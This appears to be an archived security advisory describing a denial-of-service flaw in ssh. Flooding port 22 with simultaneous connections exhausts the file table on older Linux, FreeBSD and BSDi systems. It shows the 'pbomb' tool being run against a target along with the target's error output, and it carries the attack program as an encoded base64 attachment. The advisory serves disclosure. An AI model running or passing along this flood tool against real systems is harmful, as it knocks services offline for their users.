COMMAND

    ssh

SYSTEMS AFFECTED

    Systems running ssh

PROBLEM

    Jeff Johnson found following  regarding ssh and file  descriptors.
    On machines  without filehandle-7  applied or  machines that don't
    run sshd  out of  xinetd with  a reasonable  (50 process or lower)
    limit,  you  can  make  the  machine  unuseable  by  making   many
    simultanious connections to port 22.  Example:

	badguy:[~]$ ./pbomb exboss.somewhere.net

    After many  connections, attempting  to execute  any command  will
    result in a file table overflow, or other errors (on 2.0.33):

	exboss:[~]$ w
	bash: fork: Try again
	exboss:[~]$ su
	su: File table overflow

    You can't  even telnet  or ssh  in anymore.   This was  after  400
    connections.  When  the attack is  stopped, everything on  the box
    returns to normal after a few minutes.  Testing on a FreeBSD 2.2.5
    box showed following:

	[~]$ telnet 24.xxx.xx.xxx
	Trying 24.xxx.xx.xxx...
	Connected to 24.xxx.xx.xxx.
	Escape character is '^]'.

	FreeBSD (bsd.vnc.xxxxxxxx.xx.xx) (ttyp2)

	login:

	^]^C - Connection closed.

	[~]$ pbomb 24.xxx.xx.xxx
	250 connects counted.
	250 connects counted.
	109 connects counted.

	[switch windows]

    It isn't working, and trying  to do anything at console  gives the
    same error:

	Trying 24.xxx.xx.xxx...
	Connected to 24.xxx.xx.xxx.
	Escape character is '^]'.
	telnetd in realloc(): warning: junk pointer, too low to make sense.
	Connection closed by foreign host.

    It seems  that BSDi  2.1-3.1 are  also affected.   Attached is the
    program used to make the connections.

    --PART-BOUNDARY=.1980115084325.ZM6979.trn.net
    Content-Description: Data
    Content-Type: application/octet-stream ; name="pbomb.c.bz2"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment ; filename="pbomb.c.bz2"
    X-Zm-Content-Name: pbomb.c.bz2
    X-Zm-Decoding-Hint: mimencode -b -u

    QlpoOTFBWSZTWW1hJ74AAJrfgHYwW3/yvzsv3g6//9/6YAKfK7s5NA8NTVPEmEaGgAABoAAM
    QNGjQAamqabSabSNoR6gaAAAAAAAAEJT9T1QxANGRoAAGCGI0AAACEhM1MjQMCGgAZNNMmQy
    GhoANBzTIyGTBDRhMEaaNGIGmTIwABBKagmjU0J5Mk0aZMkMRtIaaaNAD1GjI2pJmJASZMQH
    MObOx4xc26hDm1Jwg0udQihCZCSQ5RIJnUW0jyTMSEAD2KUwbUMzxjQ+CoVraAi2lEY7MKAh
    4/EGWf+kxzT2VXOI5NLYGbLEVWGQyoZRXC36cVSyPoZJUDpltH7gGaiRU6BRUNMepNBFIcM4
    QCoAkqn0EAJA4FTEk1FjUQcaOhYg7EftmXXbNvSQcO4tztAOswklDInXmDshLTYOQpIBXjTt
    XCOg7C0ZLz68+6N2rhhBoPOvmtM+sba95e56MaZOXYXeFddnEcTJCSWSqt4QUVmVqv0V0pQ3
    hIC1JBwE2TiEIaBkSNk07svm/0DwU7jlegS6+Gm4F26lU8doKHDpSSVxgRPHxAYJSphspMlw
    hfu3sFaAd1rhCgXtmj7pGJfLfiqgOG2RmKTYJxOPd63y6uyvsWsoLD+mBEu2kLBoyP8HWYaU
    5TwM0RpcE4tiYaFzXXqxsQOsW0e6wnOTRfuhzy7cZnJlYurYkoABAzsCnwlg6FEAqtfmRFzC
    UNwNxgpi5Rc7SA0YfzLF+vJB94hHHzck+HNceCYqR3jUZoZgMEB+5pWYoCFvhXN5zmjBpa5c
    3wmNCgpymBm3QQIBMIH2d48byi2EQwvMKAkyvuDuoj0ZPGm0UdLVtbX0NuXSGwnwVVNfPVX1
    P6dIIldPOs4QcedQRFzBYBbkhJjCF3Loeo2mc479D9e7KGxkHLMdjOQk4e4TzesxpcSWJGaJ
    N+NxJo4x6alIBxSr8sa8Q/TVEK96sMACgUwlwQ64zUxoYBZpBYqgUghdIJDP4u5IpwoSDawk
    98A=

    --PART-BOUNDARY=.1980115084325.ZM6979.trn.net--
SOLUTION

    Nothing so far.